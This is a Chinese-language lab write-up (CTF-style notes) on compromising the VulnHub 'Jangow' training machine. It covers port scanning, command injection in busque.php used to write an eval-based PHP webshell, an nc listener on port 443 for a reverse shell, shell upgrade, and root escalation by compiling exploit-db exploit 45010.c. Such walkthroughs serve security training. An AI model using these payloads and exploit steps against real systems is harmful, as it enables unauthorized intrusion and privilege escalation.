打靶筆記-04-vulnhub-Jangow
前面兩篇名稱寫成了vulhub,已經更改為vulnhub;vulhub的之後再找個時間集中打一遍。
一、靶機資訊
Name: Jangow: 1.0.1 (Easy)
Date release: 4 Nov 2021
Author: Jangow
Series: Jangow
二、啟動靶機
2.1 校驗靶機
2.2 匯入Vbox,配置網路
因為攻擊機器都在vmware上,所以還是將靶機網路橋接到vmnet8網路卡上。
2.3 打快照,啟動靶機
沒啥好說的,以防萬一,打個快照啟動
可以直接看到ip地址,不過按照實際中的話時看不到這個介面的。
三、開始打靶
3.1 資訊蒐集
3.1.1 主機發現
ifconfig
sudo arp-scan -I eth0 -l
獲得靶機IP 172.16.95.140
3.1.2 埠發現
sudo nmap -p- 172.16.95.140
只開放22和80埠
3.1.3 進一步確認埠背後服務以及具體版本號
sudo nmap -sV -p22,80 172.16.95.140
可以看到22埠是filtered的狀態,也就是22埠被防火牆過濾了,80埠對應的是Apache httpd 2.4.18
3.1.4 使用nmap預設指令碼掃描
sudo nmap -sC -p22,80 172.16.95.140
貌似沒有啥發現,80埠也掛載的是普通頁面,先看看去
3.2 開始滲透
3.2.1 訪問80埠
是個目錄,繼續點,發現是個網頁,然後裡面有一個目錄連結site,繼續點
最後發現個連結指向一個busque.php檔案,並且擁有引數buscar可以接收值,但不知道幹啥用的,最後經過fuzz測試,確定為命令執行
3.2.2 資訊收集
既然是命令執行,那就可以直接來一波簡單的資訊收集
id
pwd
ls
ls ./wordpress
cat ./wordpress
在進行常規資訊蒐集後,發現有一個wordpress的目錄,並且還獲取到了資料庫賬
不過以上好像沒啥用,資料庫也無法訪問,也沒有更多有用的目錄。
3.2.3 寫入小馬
因為命令執行,所以嘗試了各種姿勢反彈shell,可能是水平不夠,wget也無法下載到遠端伺服器上的馬兒,所以就開始嘗試寫入小馬
http://172.16.95.140/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_POST[%27ant%27]);?%3E%27%20%3E1.php
成功寫入,上蟻劍,連線成功
繼續收集資訊,獲得使用者jangow01家目錄下有個user.txt,內容似乎是md5加密的,可以順手破解一下,不過好像是空的,沒有任何內容,奇怪
翻了翻其他目錄在html目錄下發現.backup檔案,裡面是使用者jangow01的mysql賬戶密碼
然後嘗試上傳反彈shell的php檔案也無法反彈成功
3.2.4 反彈shell
蟻劍雖然連線成功了,但是shell最終還是個webshell,可乾的事兒有限,所以還是的反彈shell提權
經歷過剛剛命令執行反彈shell失敗,然後嘗試上傳反彈shell的php檔案也失敗了,聯想剛開始埠掃描時22埠被過濾的情況,應該是目標機器防火牆搞得鬼。
不過好在目標機器nc可以使用,不過最終也沒有反彈成功,因為它無法帶-e引數。
=-=
打到這兒自己就沒思路了,最後檢視了別人的攻略,這兒的關鍵點在於目標機器防火牆對進出的埠進行了限制,最後嘗試了443埠可以成功利用
nc -lvnp 443
3.2.5 升級shell為tty
which python python2 python3 py py2 py3
python -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm-256color
stty raw -echo;fg
3.2.6 尋找漏洞提權
升級shell之後,就可以sudo和su了,結合之前發現的兩個mysql賬戶名密碼,嘗試了以下切換使用者,結果mysql的賬戶密碼和系統的賬戶密碼一致。
然後嘗試sudo的時候失敗了,好像不是英文,不過看到了個sudoer,猜測應該是提示這個使用者不再sudoer檔案中,也就是沒有sudo的許可權。
那就看看有沒有其他漏洞可以利用吧
uname -r
uname -a
lsb_release -a
ubuntu的版本為16.04.1 LTS
searchsploit Linux Kernel 4.4.
這個搜尋到的有很多看著比較符合,不過這個有點意思的是有個在windows的分類下,有點奇怪,先拿它看看
sudo cp /usr/share/exploitdb/exploits/windows_x86-64/local/47170.c /var/www/html/test.c
然後在目標機器上下載test.c,結果都無法搞定,應該是對方防火牆導致的。
=-=,一會兒提權成功一定要看下它的防火牆策略,最後通過蟻劍傳了過去,不過gcc編譯失敗了
繼續換linux/local/45010.c
sudo cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
然後還是通過蟻劍上傳編譯執行,最後成功拿到root許可權
ls
gcc -o exp 45010.c
chmod +x exp
./exp
id
3.2.7 檢視防火牆
bash
sudo ufw status
果然,=-=,禁止訪問任何埠,除了443
關閉防火牆,可以成功訪問,真變態
四、總結
這個靶機難點就是能夠找到唯一可利用的443埠進行反彈shell,沒有這個埠,有再多的反彈姿勢,防火牆攔截的死死的,除非能用webshell進行本地提權,這個不現實,至少對我來說是的,能力不夠
然後看到別人有批量提權的指令碼,先記錄下,隨後的靶機中嘗試以下
linux 提權輔助指令碼
敖~,果然特麼神器=-=
原諒我這個菜雞現在才找到這些神器,應該在自己犯懶的時候先找下有沒有懶人神器,沒有的話自己總結搞一個,加油~~~